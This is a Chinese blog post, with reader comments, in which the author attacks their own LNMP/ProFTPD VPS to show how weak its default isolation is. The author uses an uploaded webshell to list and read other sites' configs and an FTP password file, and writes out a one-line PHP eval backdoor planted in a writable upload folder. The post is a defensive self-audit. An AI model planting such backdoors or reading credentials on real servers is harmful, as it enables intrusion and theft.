对自己VPS的一次安全检测

    最近想给学弟学妹赞助点主机,正好我的VPS资源尚有不少。在提供之前,先检查一下自己的vps安全性,检查以后吓自己一跳。

    先说明一下我的VPS状况:

        debian Linux 2.6.32-5-686-bigmem #1 SMP Sun Sep 23 10:27:25 UTC 2012 i686 GNU/Linux

        安装的是http://lnmp.org/的LNMP一键安装包,并又安装了其中的ProFTP。然后没有再装其他东西了。

        网站根目录在/home/wwwroot/,现有的目录结构是这样:

        点击查看原图

        配置过程基本默认:先用/root/vhost.sh创建1.xxx.com、2.xxx.com,3.xxx.com,再用/root/proftpd_vhost.sh新建两个ftp用户wordpress和afcin,分别赋予其根目录为2.xxx.com、3.xxx.com,而1.xxx.com还是归www用户所有。最后来到/home/wwwroot下把两个目录所有者修改为wordpress和afcin,就有了上图。

        /root/vhost.sh和/root/proftpd_vhost.sh脚本是默认装好lnmp与proftpd后就有的,这个装过的朋友应该清楚。

        然后再以各自用户权限上传web应用,1.xxx.com是emlog,2.xxx.com是wordpress,3.xxx.com是typecho。最后,2.xxx.com传一个大马(2011.php)和一个一句话(1.php)。

    

    我现在就以wordpress权限的大马和一句话来跨站。

    首先菜刀连接一句话:

    02.jpg

    首先我发现,用ftp上传上去的2011.php和01.php是644权限,(其他的都是755权限是因为其他的文档都是我用root权限传上去并将所有人改为wordpress的)然后菜刀不能执行命令:

    03.jpg

    而且目录不可写。也无法读上层目录,mysql不是root权限。

    菜刀感觉这个时候无力了,于是打开我们的大马2011.php。

    大马也是目录不可写(废话),但可以执行命令:

    04.jpg

    于是这样好办了,先看看能不能list他人的目录:

    05.jpg

    直接列出了1.xxx.com的目录文件。试着读一读它的配置文件:

    06.jpg

    没有回显。我试了cat、less、more、head都没有回显,但神奇的tail命令给了我惊喜:

    07.jpg

    居然读出来了!这让我很纳闷,tail跟head应该是好基友,为何head不行tail就可以。理解不了就不理解了。

    读出数据库账号密码就能在菜刀里直接连接数据库了,不过密码解不出来。但是读出的auth key能伪造cookie访问后台,emlog后台秒拿shell(如果目录有写权限的话)。于是,成功的把目录给跨了。

    然后继续。我们来到/tmp:

    08.jpg

    发现其中有一个.passwd有可读权限,我们试试tail:

    09.jpg

    居然是用户afcin的ftp账号密码……这样,3.xxx.com不用跨目录就沦陷了……

    再继续。如果我们通过数据库、后台手段拿不下1.xxx.com的webshell,怎么办?于是再拿出shell,找找有没有目录可写的。一般像图片、附件上传目录都能写的,比如:

    11.jpg

    发现一个可写的目录,于是我们向其中写入一句话:

    echo '<?php eval($_POST[phithon]); ?>' > /home/wwwroot/1.xxx.com/content/uploadfile/201310/00.php

    用菜刀连接看看:

    12.jpg

    OK无压力。

    基本上能跨的都被我跨了,提权就不试了,太晚了。


    经过这一轮的测试,我才发现,默认的lnmp和ftp安全性是多么脆弱。如果我把这样的ftp账户发送给学弟,我自己网站被他们爆菊了都不知道。。。

    希望大家看过文章后能警觉,php安全模式还是要开启的。默认配置害死人,请大家留意。

赞赏

喜欢这篇文章,扫码和我成为赞友!

评论

mr 回复

把那些函数禁用了就可以

卧槽,我是不是班门弄斧了- -

phithon 回复

@mr:禁用掉执行命令的函数只是一方面,还有包括跨目录等都得限制。

肥皂 回复

厉害,渗透。编程样样精呀。

Thxse 回复

跪了! 专业的文章!
同求赞助! {smile:11}

白银投资 回复

{smile:1}来学习一下

焦炭产业 回复

留个言,支持下

丰禾棋牌 回复

感谢分享,学习了。赞一个

这么长的名称 回复

进步太快了,跟不上{smile:15}

海棠秋客 回复

学习一下

陆阳贤博客 回复

还没升级到用vps的阶段

董振伟 回复

来串门喽

李明 回复

没用过VPS,不了解这些,分析很详细,不错。

按摩椅 回复

貌似很不错哦

LaoLuo 回复

@phithon:哎,久没关注,才发现现在的杀毒软件这么厉害,dll后门都能查出来了,哎。。。{smile:15}{smile:15}

LaoLuo 回复

楼主对这个还有研究啊,话说以前也有玩黑,hackerxfiles是我在这条道路上的启蒙老师,现在也停了,唉。。

captcha